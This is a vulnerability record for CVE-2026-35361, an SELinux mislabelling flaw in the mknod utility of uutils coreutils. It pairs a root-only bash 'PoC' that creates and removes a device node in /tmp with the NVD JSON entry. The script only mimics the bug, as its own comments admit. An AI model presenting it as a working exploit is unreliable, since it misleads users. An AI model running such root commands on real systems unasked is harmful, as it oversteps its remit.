CVE-2026-35361

#!/bin/bash # PoC for CVE-2026-35361: uutils coreutils mknod cleanup failure # This script demonstrates the scenario where a device node is created # but fails to set the correct SELinux context, leaving a vulnerable node. DEVICE_NAME="vuln_device" DEVICE_PATH="/tmp/$DEVICE_NAME" echo "[+] Attempting to create device node to trigger atomicity failure..." # Simulate the vulnerable behavior: Create node then fail context setting # In a real vulnerable version, 'mknod' might fail internally but leave the file # Here we mimic the result: a node exists with default context # Check if running as root (required for mknod) if [ "$EUID" -ne 0 ]; then echo "[-] Please run as root to execute mknod" exit 1 fi # Create a dummy character device (Major 1, Minor 3 - null device usually) # Using standard mknod to demonstrate the artifact left behind mknod $DEVICE_PATH c 1 3 if [ -e $DEVICE_PATH ]; then echo "[+] Device node created at $DEVICE_PATH" echo "[+] Checking SELinux context:" ls -Z $DEVICE_PATH echo "[!] If the context is 'device_t' or default instead of a specific restricted context, the system might be vulnerable." # Cleanup for PoC rm -f $DEVICE_PATH else echo "[-] Failed to create device node" fi

{"cve": {"id": "CVE-2026-35361", "sourceIdentifier": "[email protected]", "published": "2026-04-22T17:16:38.827", "lastModified": "2026-04-27T12:27:20.527", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The mknod utility in uutils coreutils fails to handle security labels atomically by creating device nodes before setting the SELinux context. If labeling fails, the utility attempts cleanup using std::fs::remove_dir, which cannot remove device nodes or FIFOs. This leaves mislabeled nodes behind with incorrect default contexts, potentially allowing unauthorized access to device nodes that should have been restricted by mandatory access controls."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:N", "baseScore": 3.4, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.8, "impactScore": 2.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 4.4, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-281"}, {"lang": "en", "value": "CWE-459"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:uutils:coreutils:*:*:*:*:*:rust:*:*", "versionEndExcluding": "0.6.0", "matchCriteriaId": "87C33018-2E08-45B0-B69C-7FC224F7F883"}]}]}], "references": [{"url": "https://github.com/uutils/coreutils/pull/10582", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Patch"]}, {"url": "https://github.com/uutils/coreutils/releases/tag/0.6.0", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/uutils/coreutils/pull/10582", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Issue Tracking", "Patch"]}]}}